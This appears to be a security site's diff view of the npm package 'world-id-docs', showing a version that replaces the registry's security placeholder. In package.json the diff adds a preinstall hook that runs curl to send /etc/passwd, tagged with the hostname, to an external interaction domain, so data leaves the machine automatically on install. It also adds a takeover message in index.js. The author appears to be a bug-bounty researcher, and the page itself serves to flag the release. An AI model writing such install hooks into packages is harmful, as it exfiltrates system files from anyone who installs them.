world-id-docs 0.0.1-security → 9.10.11
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of world-id-docs might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +12 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
alert('WorldCoinDocs take over by santiko1986')
|
package/package.json
CHANGED
@@ -1,6 +1,15 @@
|
|
1
1
|
{
|
2
2
|
"name": "world-id-docs",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "9.10.11",
|
4
|
+
"description": "This package has been taken over by santiko1986@wearehackerone.com",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).qneyapqtneubpwwkqdpg1zumzli0z33i7.oast.fun"
|
8
|
+
},
|
9
|
+
"author": "santiko1986@wearehackerone.com",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
"world-id-docs": "^9.10.11"
|
13
|
+
},
|
14
|
+
"keywords": []
|
6
15
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=world-id-docs for more information.
|